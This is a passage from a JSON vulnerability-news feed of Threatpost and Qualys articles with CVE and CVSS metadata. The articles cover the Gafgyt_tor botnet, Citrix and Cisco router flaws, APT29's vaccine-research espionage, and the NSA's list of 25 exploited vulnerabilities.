"https://threatpost.com/php-bug-rce-nginx-servers/149593/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-05T16:44:35", "description": "Researchers have discovered what they say is the first variant of the Gafgyt botnet family to cloak its activity using the Tor network.\n\nGafgyt, a [botnet that was uncovered in 2014](<https://threatpost.com/mirai-gafgyt-botnets-return-to-target-infamous-apache-struts-sonicwall-flaws/137309/>), has become infamous for launching large-scale distributed denial-of-service (DDoS) attacks. Researchers first discovered activity from the newest variant, which they call Gafgyt_tor, on Feb. 
15.\n\nIn order to evade detection, Gafgyt_tor uses Tor to hide its command-and-control (C2) communications, and encrypts sensitive strings in the samples. The use of [Tor by malware families is nothing new;](<https://threatpost.com/chewbacca-latest-malware-to-take-a-liking-to-tor/103220/>) however, researchers said they haven\u2019t seen Gafgyt leveraging the anonymity network until now.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cCompared with other Gafgyt variants, the biggest change of Gafgyt_tor is that the C2 communication is based on Tor, which increases the difficulty of detection and blocking,\u201d said researchers with NetLab 360 [on Thursday](<https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/>). \u201cThe Tor-based C2 communication mechanism has been seen in other families we have analyzed before\u2026 but this is the first time we encountered it in the Gafgyt family.\u201d\n\n## **Gafgyt_tor Botnet: Propagation and New Functionalities**\n\nThe botnet is mainly propagated through weak Telnet passwords \u2013 a common issue on [internet of things devices](<https://threatpost.com/hacker-leaks-more-than-500k-telnet-credentials-for-iot-devices/152015/>) \u2013 and through exploiting three vulnerabilities. 
These vulnerabilities include a remote code execution flaw (CVE-2019-16920) [in D-Link devices](<https://threatpost.com/d-link-routers-zero-day-flaws/162064/>); a remote code execution vulnerability in Liferay enterprise portal software (for which no CVE is available); and a flaw (CVE-2019-19781) in Citrix Application Delivery Controller.\n\nResearchers said that the code structure of Gafgyt_tor\u2019s main function \u2013 which now carries the Tor proxy code that supplies the C2 server\u2019s address \u2013 shows widespread changes.\n\n\u201cThe original initConnection() function, which is responsible for establishing the C2 connection, is gone, replaced by a large section of code responsible for establishing the Tor connection,\u201d they said.\n\n## **New Tor Capabilities, Commands**\n\nWithin this large section of code exists tor_socket_init, a function that is responsible for initializing a list of proxy nodes with IP addresses and a port. Researchers said that more than 100 Tor proxies can be built in this way \u2013 and new samples are continually updating the proxy list.\n\n[The new versus old code structure for the Gafgyt variant](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/03/05101946/ver1_ver2_cmp_cfg.en_.png>). Credit: NetLab 360\n\n\u201cAfter initializing the proxy list, the sample will select a random node from the list to enable Tor communication via tor_retrieve_addr and tor_retrieve_port,\u201d said researchers.\n\nOnce the Tor connection through the chosen proxy is up, the bot requests wvp3te7pkfczmnnl.onion, the C2 address, and then awaits commands from it.\n\n\u201cThe core function of Gafgyt_tor is still DDoS attacks and scanning, so it mostly follows the common Gafgyt directive,\u201d said researchers. They noted that a new directive called LDSERVER has been added to the botnet, which allows the C2 to quickly specify servers from which the payloads are downloaded. 
The LDSERVER directive lets attackers change course quickly should an attacker-owned download server be identified and blocked, said researchers.\n\n\u201cThis directive means that C2 can dynamically switch download servers, so that it can quickly switch to a new download server to continue propagation if the current one is blocked,\u201d said researchers.\n\n## **Links to Freak Threat Actor, Other Botnets**\n\nResearchers said that the variant shares the same origin with the Gafgyt samples distributed by a threat group that NetLab 360 researchers call the keksec group, and that other researchers [call the Freak threat actor](<https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/>). They said the keksec group reuses code and IP addresses between various other bot families, including the Tsunami botnet as well as the Necro botnet family uncovered in January.\n\n\u201cWe think that Gafgyt_tor and Necro are very likely operated by the same group of people, who have a pool of IP addresses and multiple botnet source codes, and have the ability of continuous development,\u201d said researchers. \u201cIn actual operation, they form different families of botnets, but reuse infrastructure such as IP address.\u201d\n\n## **Other Gafgyt Botnet Variants**\n\nGafgyt_tor is only the latest variant of the popular botnet to come to light. 
In 2019, researchers warned of a [new Gafgyt variant adding vulnerable IoT devices](<https://threatpost.com/valve-source-engine-fortnite-servers-crippled-by-gafgyt-variant/149719/>) to its botnet arsenal and using them to cripple gaming servers worldwide.\n\nIn 2018, researchers said they discovered new variants for the Mirai and [Gafgyt IoT botnets](<https://threatpost.com/mirai-gafgyt-botnets-return-to-target-infamous-apache-struts-sonicwall-flaws/137309/>) targeting well-known vulnerabilities in Apache Struts and SonicWall, as well as a separate attack actively launching two IoT/Linux botnet [campaigns](<https://threatpost.com/d-link-dasan-routers-under-attack-in-yet-another-assault/134255/>), exploiting the [CVE-2018-10562 and CVE-2018-10561 bugs in Dasan routers](<https://threatpost.com/millions-of-home-fiber-routers-vulnerable-to-complete-takeover/131593/>).\n\nMore recently, last year a botnet called [Hoaxcalls emerged](<https://threatpost.com/hoaxcalls-botnet-symantec-secure-web-gateways/155806/>) as a variant of the Gafgyt family. 
The botnet, which can be marshalled for large-scale distributed denial-of-service (DDoS) campaigns, is spreading [via an unpatched vulnerability](<https://threatpost.com/fast-moving-ddos-botnet-unpatched-zyxel-rce-bug/155059/>) impacting the ZyXEL Cloud CNM SecuManager.\n", "cvss3": {}, "published": "2021-03-05T15:55:41", "type": "threatpost", "title": "D-Link, IoT Devices Under Attack By Tor-Based Gafgyt Variant", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-10561", "CVE-2018-10562", "CVE-2019-16920", "CVE-2019-19781"], "modified": "2021-03-05T15:55:41", "id": "THREATPOST:B7F31FCDC8936516C077D39FEF9235AA", "href": "https://threatpost.com/d-link-iot-tor-gafgyt-variant/164529/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:22:57", "description": "Multiple vulnerabilities in the Citrix Application Delivery Controller (ADC) and Gateway would allow code injection, information disclosure and denial of service, the networking vendor announced Tuesday. 
Four of the bugs are exploitable by an unauthenticated, remote attacker.\n\nThe Citrix products (formerly known as NetScaler ADC and Gateway) are used for application-aware traffic management and secure remote access, respectively, and are installed in at least 80,000 companies in 158 countries, according to a December assessment from Positive Technologies.\n\nOther flaws announced Tuesday also affect Citrix SD-WAN WANOP appliances, models 4000-WO, 4100-WO, 5000-WO and 5100-WO.\n\nAttacks on the management interface of the products could result in system compromise by an unauthenticated user on the management network; or system compromise through cross-site scripting (XSS). Attackers could also create a download link for the device which, if downloaded and then executed by an unauthenticated user on the management network, could result in the compromise of a local computer.\n\n\u201cCustomers who have configured their systems in accordance with [Citrix recommendations](<https://docs.citrix.com/en-us/citrix-adc/citrix-adc-secure-deployment/secure-deployment-guide.html>) [i.e., to have this interface separated from the network and protected by a firewall] have significantly reduced their risk from attacks to the management interface,\u201d according to the vendor.\n\nThreat actors could also mount attacks on Virtual IPs (VIPs). 
VIPs, among other things, are used to provide users with a unique IP address for communicating with network resources for applications that do not allow multiple connections or users from the same IP address.\n\nThe VIP attacks include denial of service against either the Gateway or Authentication virtual servers by an unauthenticated user; or remote port scanning of the internal network by an authenticated Citrix Gateway user.\n\n\u201cAttackers can only discern whether a TLS connection is possible with the port and cannot communicate further with the end devices,\u201d according to the critical [Citrix advisory](<https://support.citrix.com/article/CTX276688>). \u201cCustomers who have not enabled either the Gateway or Authentication virtual servers are not at risk from attacks that are applicable to those servers. Other virtual servers e.g. load balancing and content switching virtual servers are not affected by these issues.\u201d\n\nA final vulnerability has been found in Citrix Gateway Plug-in for Linux that would allow a local logged-on user of a Linux system with that plug-in installed to elevate their privileges to an administrator account on that computer, the company said.\n\nOf the 11 vulnerabilities, there are six possible attack routes, but five of those have barriers to exploitation. Also, the latest patches fully resolve all the issues. Here\u2019s a full list of the bugs with exploitation barriers listed:\n\n\n\nSince Citrix is mainly used for giving remote access to applications in companies\u2019 internal networks, a compromise could easily be used as a foothold to move laterally across a victim organization. 
However, Citrix CISO Fermin Serna said in an accompanying [blog post](<https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/>) that the company isn\u2019t aware of any active exploitation of the issues so far, and he stressed that the barriers to exploitation of these flaws are significant.\n\n\u201cThere are barriers to many of these attacks; in particular, for customers where there is no untrustworthy traffic on the management network, the remaining risk reduces to a denial-of-service attack,\u201d he wrote. \u201cAnd in that case, only when Gateway or authentication virtual servers are being used. Other virtual servers, for example, load balancing and content switching virtual servers, are not affected by the issue.\u201d\n\nHe added, \u201cthree possible attacks additionally require some form of existing access. That effectively means an external malicious actor would first need to gain unauthorized access to a vulnerable device to be able to conduct an attack.\u201d\n\nSerna also noted that the bugs aren\u2019t related to the CVE-2019-19781 critical bug in Citrix ADC and Gateway, [announced in December](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>). That zero-day flaw [remained unpatched](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) for almost a month and in-the-wild attacks [followed](<https://threatpost.com/chinese-hackers-exploit-cisco-citrix-espionage/154133/>).\n", "cvss3": {}, "published": "2020-07-07T14:44:30", "type": "threatpost", "title": "Citrix Bugs Allow Unauthenticated Code Injection, Data Theft", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-19781", "CVE-2020-5135", "CVE-2020-8187", "CVE-2020-8190", "CVE-2020-8191", "CVE-2020-8193", "CVE-2020-8194", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8197", "CVE-2020-8198", "CVE-2020-8199"], "modified": "2020-07-07T14:44:30", "id": "THREATPOST:575F655420B93C2305DEE73F769E7E0B", "href": "https://threatpost.com/citrix-bugs-allow-unauthenticated-code-injection-data-theft/157214/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-16T19:56:37", "description": "The advanced threat actor known as APT29 has been hard at work attempting to pilfer COVID-19 vaccine research from academic and pharmaceutical research institutions in various countries around the world, including the U.S.\n\nThat\u2019s according to a joint alert from the U.S. Department of Homeland Security (DHS), the U.K.\u2019s National Cyber Security Centre (NCSC) and Canada\u2019s Communications Security Establishment (CSE), [issued Thursday](<https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development>).\n\nThe 14-page advisory details the recent activity of Russia-linked APT29 (a.k.a. 
CozyBear or the Dukes), including the use of custom malware called \u201cWellMess\u201d and \u201cWellMail\u201d for data exfiltration.\n\n\u201cThroughout 2020, APT29 has targeted various organizations involved in COVID-19 vaccine development in Canada, the United States and the United Kingdom, highly likely with the intention of stealing information and intellectual property relating to the development and testing of COVID-19 vaccines,\u201d the report noted.\n\nThis specific activity was seen starting in April, but security researchers noted that nation-state espionage targeting coronavirus treatments and cures [has been a phenomenon all year](<https://threatpost.com/nation-backed-apts-covid-19-spy-attacks/155082/>).\n\n\u201cCOVID-19 is an existential threat to every government in the world, so it\u2019s no surprise that cyber-espionage capabilities are being used to gather intelligence on a cure,\u201d said John Hultquist, senior director of analysis at Mandiant Threat Intelligence, via email. \u201cThe organizations developing vaccines and treatments for the virus are being heavily targeted by Russian, Iranian and Chinese actors seeking a leg up on their own research. We\u2019ve also seen significant COVID-related targeting of governments that began as early as January.\u201d\n\n## **Exploits in Play**\n\nTo mount the attacks, APT29 is using exploits for known vulnerabilities to gain initial access to targets, according to the analysis, along with spearphishing to obtain authentication credentials to internet-accessible login pages for target organizations. 
The exploits in rotation include the recent [Citrix code-injection bug](<https://threatpost.com/citrix-bugs-allow-unauthenticated-code-injection-data-theft/157214/>) (CVE-2019-19781); a publicized [Pulse Secure VPN flaw](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) (CVE-2019-11510); and issues in FortiGate (CVE-2018-13379) and Zimbra (CVE-2019-9670).\n\n\u201cThe group conducted basic vulnerability scanning against specific external IP addresses owned by the [targeted] organizations,\u201d according to the report. \u201cThe group then deployed public exploits against the vulnerable services identified. The group has been successful using recently published exploits to gain initial footholds.\u201d\n\nOnce a system is compromised, the group then looks to obtain additional authentication credentials to allow further access and spread laterally.\n\n## **Custom Malware**\n\nOnce established in a network, APT29 is employing homegrown malware that the NCSC is calling WellMess and WellMail to conduct further operations on the victim\u2019s system and exfiltrate data.\n\nWellMess, first discovered in July 2018, is malware that comes in Golang or .NET versions and supports HTTP, TLS and DNS for communications.\n\nNamed after one of the function names in the malware, \u201cWellMess is a lightweight malware designed to execute arbitrary shell commands, upload and download files,\u201d according to the advisory.\n\nWellMail malware, meanwhile, named after file paths containing the word \u2018mail\u2019 and the use of server port 25, is also lightweight \u2013 and is designed to run commands or scripts while communicating with a hardcoded command-and-control (C2) server.\n\n\u201cThe binary is an ELF utility written in Golang which receives a command or script to be run through the Linux shell,\u201d according to the NCSC. 
\u201cTo our knowledge, WellMail has not been previously named in the public domain.\u201d\n\nBoth malware families use hard-coded client and certificate authority TLS certificates to communicate with their C2 servers.\n\n\u201cWellMess and WellMail samples contained TLS certificates with the hard-coded subjectKeyIdentifier (SKI) \u20180102030406\u2019, and used the subjects \u2018C=Tunis, O=IT\u2019 and \u2018O=GMO GlobalSign, Inc\u2019 respectively,\u201d detailed the report. \u201cThese certificates can be used to identify further malware samples and infrastructure. Servers with this GlobalSign certificate subject may be used for other functions in addition to WellMail malware communications.\u201d\n\nAPT29 is also using another malware, dubbed \u2018SoreFang\u2019 by the NCSC, which is a first-stage downloader that uses HTTP to exfiltrate victim information and download second-stage malware. It\u2019s using the same C2 infrastructure as a WellMess sample, the agencies concluded.\n\nThis sample is not a custom job: \u201cIt is likely that SoreFang targets SangFor devices. Industry reporting indicates that other actors, reportedly including [DarkHotel](<https://threatpost.com/microsoft-zero-day-actively-exploited-patch/152018/>), have also targeted SangFor devices,\u201d noted the NCSC.\n\n## **APT29: A Sporadically High-Profile Threat**\n\n[APT29](<https://attack.mitre.org/groups/G0016/>) has long been seen targeting high-value targets across the think-tank, law enforcement, media, U.S. military, imagery, transportation, pharmaceutical, national government and defense contracting sectors.\n\nThe group is perhaps best known for the [intrusion](<https://threatpost.com/dnc-hacked-research-on-trump-stolen/118656/>) at the Democratic National Committee ahead of the U.S. presidential election in 2016. 
It was also implicated in [a widespread phishing campaign](<https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/>) in November 2016, in attacks against the White House, State Department and Joint Chiefs of Staff.\n\nIt was next seen in November 2017 [executing a Tor backdoor](<https://threatpost.com/apt29-used-domain-fronting-tor-to-execute-backdoor/124582/>), and then [it reemerged](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>) in 2018 with a widespread espionage campaign against military, media and public-sector targets.\n\nIts history stretches back a few years though: It [was also seen](<https://threatpost.com/white-house-state-department-counted-among-cozyduke-apt-victims/112382/>) by Kaspersky Lab carrying out data-mining attacks against the White House and the Department of State in 2014.\n\nResearchers from firms [like Mandiant](<https://www.fireeye.com/current-threats/apt-groups/rpt-apt29.html>) believe APT29 to be linked to Russian government-backed operations \u2013 an assessment that the DHS and NCSC reiterated in the latest advisory, saying that it is \u201calmost certainly part of the Russian intelligence services.\u201d\n\nWhile its publicly profiled activity tends to be sporadic, APT29 is rarely at rest, according to Mandiant\u2019s Hultquist.\n\n\u201cDespite involvement in several high-profile incidents, APT29 rarely receives the same attention as other Russian actors because they tend to quietly focus on intelligence collection,\u201d he said via email. 
\u201cWhereas GRU actors have brazenly leaked documents and carried out destructive attacks, APT29 digs in for the long term, siphoning intelligence away from its target.\u201d\n\nThis latest case is no exception to that M.O., according to the advisory: \u201cAPT29 is likely to continue to target organizations involved in COVID-19 vaccine research and development, as they seek to answer additional intelligence questions relating to the pandemic,\u201d the agencies concluded.\n\nThat said, at least one researcher warned that the end-game of the activity might be more nefarious than simply getting a leg up on a cure.\n\n\u201cAPT29 (Cozy Bear, Office Monkeys) has successfully demonstrated the extension of nation-state power through cyber-action for more than a dozen years,\u201d Michael Daly, CTO at Raytheon Intelligence & Space, said via email. \u201cHowever, they are not focused on simple intellectual property theft. Instead, their focus is rooted in influence operations \u2013 the changing of hearts and minds to thwart and diminish the power of governments and organizations.\u201d\n\nHe added, \u201cIn the case of this breach of vaccine research centers, we should be most concerned not that someone else might also get a vaccine, but that the information will be used to undermine the confidence of the public in the safety or efficacy of the vaccines, slowing their adoption, or in some way cause their release to be delayed. 
The effect of such a delay would be both impactful to the health of Western populations, but also to the social stability and economic stability of the West.\u201d\n", "cvss3": {}, "published": "2020-07-16T18:05:20", "type": "threatpost", "title": "Hackers Look to Steal COVID-19 Vaccine Research", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670"], "modified": "2020-07-16T18:05:20", "id": "THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB", "href": "https://threatpost.com/state-sponsored-hackers-steal-covid-19-vaccine-research/157514/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-08T12:00:33", "description": "After a botched first attempt at patching two high-severity bugs affecting its RV320 and RV325 routers, Cisco Systems is out with fresh new fixes for both devices. However, Cisco isn\u2019t out of the woods yet. On Thursday, it also reported two new medium-severity router bugs impacting the same router models \u2013 and with no reported fixes or workarounds.\n\nThe good news for Cisco was it said it finally successfully patched its RV320 and RV325 WAN VPN routers after first bungling the fix. Last week, [Cisco notified customers](<https://threatpost.com/cisco-releases-flood-of-patches-for-ios-xe-and-small-business-routers/143228/>) that it had mismanaged a patch originally issued in September 2018 when it attempted to fix two router vulnerabilities ([CVE-2019-1652](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject>) and [CVE-2019-1653](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info>)) \u2013 both rated as being of high importance.\n\n\u201cThe initial fix for this vulnerability was found to be incomplete. 
The complete fix is now available in Firmware Release 1.4.2.22,\u201d wrote Cisco on Thursday, referring to [CVE-2019-1652](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject>), a command injection vulnerability. According to the bulletin, the flaw allowed an authenticated, remote attacker with administrative privileges to execute arbitrary commands on either the RV320 or RV325 routers.\n\nFor [CVE-2019-1653](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info>), Cisco posted the exact [same status update](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info>), notifying customers of the same firmware fix. The bug in this case is an information disclosure vulnerability \u201c[that] could allow an unauthenticated, remote attacker to retrieve sensitive information,\u201d Cisco wrote.\n\n**Righting the Routers\u2019 Wrongs**\n\nInitially, the bugs were identified last September by RedTeam Pentesting and patched by Cisco on January 23. Making matters worse, on January 25, security researcher [David Davidson published proof-of-concept](<https://github.com/0x27/CiscoRV320Dump>) hacks for the two routers. As customers rushed to apply the patches, hackers reportedly began attacking both routers.\n\nPart of Cisco\u2019s January fix included blacklisting the user agent of the so-called client for URLs (or cURL) on the routers. cURL is a command line tool for transferring data using various protocols. Presumably, blacklisting the user agent for cURL would keep attackers out. That wasn\u2019t the case, and Cisco critics chimed in, stating that the blacklisting could easily be bypassed.\n\nhttps://twitter.com/hrbrmstr/status/1110995488235503616\n\nLast Wednesday, Cisco admitted as much, relaying a message to customers that both router patches were \u201cincomplete\u201d and that both were still vulnerable to attack. 
It added that in both cases, \u201cfirmware updates that address [these vulnerabilities] are not currently available.\u201d It also said there are no workarounds that address either vulnerability.\n\n**New Medium-Severity Headaches for Cisco**\n\nAlso Thursday, Cisco reported two new medium-severity bugs also affecting its RV320 and RV325 routers, both with no patches available. One bug ([CVE-2019-1828](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190404-rv-weak-encrypt>)) is tied to weak credential encryption used by both routers. The other ([CVE-2019-1827](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190404-rv-xss>)) is an insufficient validation of user-supplied input bug, also affecting both routers.\n\nBoth reports warn, \u201cThere are no workarounds that address this vulnerability.\u201d Cisco does not mention anything about a patch in either advisory.\n\nAs for the weak credential vulnerability, it \u201cexists because affected devices use weak encryption algorithms for user credentials. An attacker could exploit this vulnerability by conducting a man-in-the-middle attack and decrypting intercepted credentials. 
A successful exploit could allow the attacker to gain access to an affected device with administrator privileges,\u201d according to Cisco.\n\nAs for the input bug, Cisco warns, \u201cA vulnerability in the Online Help web service of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated, remote attacker to conduct a reflected cross-site scripting (XSS) attack against a user of the service.\u201d\n\nAs for exploitation of the bugs, Cisco said of the weak credential bug ([CVE-2019-1828](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190404-rv-weak-encrypt>)): \u201cThe Cisco Product Security Incident Response Team (PSIRT) is aware of the public announcement or malicious use of the vulnerability that is described in this advisory.\u201d It thanked GitHub user 0x27 for reporting the vulnerability.\n\nCisco said it was not aware of any public exploits tied to the input validation bug.\n\nCisco did not return a request to comment for this article.\n", "cvss3": {}, "published": "2019-04-05T20:29:09", "type": "threatpost", "title": "Cisco Finally Patches Router Bugs As New Unpatched Flaws Surface", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-1652", "CVE-2019-1653", "CVE-2019-1827", "CVE-2019-1828"], "modified": "2019-04-05T20:29:09", "id": "THREATPOST:A584E3ED4239CD6CF484C0B5869C4A4E", "href": "https://threatpost.com/cisco-finally-patches-routers-bugs-as-new-unpatched-flaws-surface/143528/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2020-10-23T16:02:16", "description": "On October 20, 2020, the United States National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) on Chinese state-sponsored malicious cyber activity. 
The NSA alert provided a list of 25 publicly known vulnerabilities that are known to be recently leveraged by cyber actors for various hacking operations.\n\n"Since these techniques include exploitation of publicly known vulnerabilities, it is critical that network defenders prioritize patching and mitigation efforts," said the NSA advisory. It also recommended "critical system owners consider these actions a priority, in order to mitigate the loss of sensitive information that could impact U.S. policies, strategies, plans, and competitive advantage."\n\nEarlier this year, the NSA also announced Sandworm actors exploiting the [Exim MTA Vulnerability](<https://blog.qualys.com/product-tech/2020/05/29/nsa-announces-sandworm-actors-exploiting-exim-mta-vulnerability-cve-2019-10149>). Similar alerts have been published by the Cybersecurity and Infrastructure Security Agency (CISA) over the last year. CISA also issued an [advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>) about vulnerabilities that were exploited in the wild to retrieve sensitive data such as intellectual property, economic, political, and military information. 
\n\nHere is a list of the 25 publicly known vulnerabilities (CVEs) published by the NSA, along with affected products and the associated Qualys VMDR QID(s) for each vulnerability:\n\n**CVE-ID(s)**| **Affected products**| **Qualys QID(s)** \n---|---|--- \nCVE-2020-5902| Big-IP devices| 38791, 373106 \nCVE-2019-19781| Citrix Application Delivery Controller; Citrix Gateway; Citrix SDWAN WANOP| 150273, 372305, 372685 \nCVE-2019-11510| Pulse Connect Secure| 38771 \nCVE-2020-8193, CVE-2020-8195, CVE-2020-8196| Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18; Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7| 13833, 373116 \nCVE-2019-0708| Microsoft Windows multiple products| 91541, 91534 \nCVE-2020-15505| MobileIron Core & Connector| 13998 \nCVE-2020-1350| Microsoft Windows multiple products| 91662 \nCVE-2020-1472| Microsoft Windows multiple products| 91688 \nCVE-2019-1040| Microsoft Windows multiple products| 91653 \nCVE-2018-6789| Exim before 4.90.1| 50089 \nCVE-2020-0688| Microsoft Exchange Server, multiple versions| 50098 \nCVE-2018-4939| Adobe ColdFusion| 370874 \nCVE-2015-4852| Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0| 86362, 86340 \nCVE-2020-2555| Oracle Coherence product of Oracle Fusion Middleware; versions 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0| 372345 \nCVE-2019-3396| Atlassian Confluence Server before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3, and from version 6.14.0 before 6.14.2| 13459 \nCVE-2019-11580| Atlassian Crowd and Crowd Data Center| 13525 \nCVE-2020-10189| Zoho ManageEngine Desktop Central before 10.0.474| 372442 \nCVE-2019-18935| Progress Telerik UI for ASP.NET AJAX through 2019.3.1023| 372327, 150299 \nCVE-2020-0601| Microsoft Windows multiple products| 91595 \nCVE-2019-0803| Microsoft Windows multiple products| 91522 \nCVE-2017-6327| Symantec Messaging Gateway before 10.6.3-267| 11856 \nCVE-2020-3118| 
Cisco IOS XR, NCS| 316792 \nCVE-2020-8515| DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices| 13730 \n \n## Detect 25 Publicly Known Vulnerabilities using VMDR\n\nQualys released several remote and authenticated QIDs for commonly exploited vulnerabilities. You can search for these QIDs in the VMDR Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.cveIds: [CVE-2019-11510,CVE-2020-5902,CVE-2019-19781,CVE-2020-8193,CVE-2020-8195,CVE-2020-8196,CVE-2019-0708,CVE-2020-15505,CVE-2020-1472,CVE-2019-1040,CVE-2020-1350,CVE-2018-6789,CVE-2018-4939,CVE-2020-0688,CVE-2015-4852,CVE-2020-2555,CVE-2019-3396,CVE-2019-11580,CVE-2020-10189,CVE-2019-18935,CVE-2020-0601,CVE-2019-0803,CVE-2017-6327,CVE-2020-3118,CVE-2020-8515]_\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize these vulnerabilities for the "Active Attack" RTI:\n\n\n\n### Identify Vulnerable Assets using Qualys Threat Protection\n\nIn addition, Qualys customers can locate vulnerable hosts through [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) by simply clicking on the impacted hosts. This helps in effectively identifying and tracking these vulnerabilities.\n\n\n\nWith VMDR Dashboard, you can track 25 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. 
With trending enabled for dashboard widgets, you can keep track of these vulnerability trends in your environment using the ["NSA's Top 25 Vulnerabilities from China" dashboard](<https://qualys-secure.force.com/customer/s/article/000006429>).\n\n\n\n### **Recommendations**\n\nAs guided by CISA, to protect assets from exploitation, organizations should do the following:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * Security teams should keep a close eye on indicators of compromise (IOCs) and maintain strict reporting processes.\n * Regular incident response exercises at the organizational level are always recommended as a proactive approach.\n\n#### **Remediation and Mitigation**\n\n * Patch systems and equipment promptly and diligently.\n * Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) to automatically identify, detect and patch the high-priority commonly exploited vulnerabilities.\n\n### References\n\n<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>\n\n<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\n<https://us-cert.cisa.gov/ncas/current-activity/2020/10/20/nsa-releases-advisory-chinese-state-sponsored-actors-exploiting>", "cvss3": {}, "published": "2020-10-22T23:10:29", "type": "qualysblog", "title": "NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-10149", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", 
"CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "modified": "2020-10-22T23:10:29", "id": "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T00:22:53", "description": "**Update Jan 5, 2021**: New patching section with two new dashboard widgets showing the number of missing FireEye-related patches in your environment and the number of assets in your environment missing one of those patches.\n\n**Update Dec 23, 2020**: Added a new section on compensating controls.\n\n**Update Dec 22, 2020: **FireEye disclosed the theft of their Red Team assessment tools. Hackers now have an influential collection of new techniques to draw upon.\n\nUsing Qualys VMDR, the vulnerabilities for Solorigate/SUNBURST can be prioritized for the following Real-Time Threat Indicators (RTIs):\n\n * Active Attacks\n * Solorigate Sunburst (**New RTI**)\n\n\n**Original post**: On December 8, 2020, [FireEye disclosed](<https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html>) theft of their Red Team assessment tools. These tools are used by FireEye to test and validate the security posture of their customers. According to FireEye, the hackers now have an influential collection of new techniques to draw upon. It is unclear today if the attackers intend to use the tools themselves or if they intend to release the tools publicly in 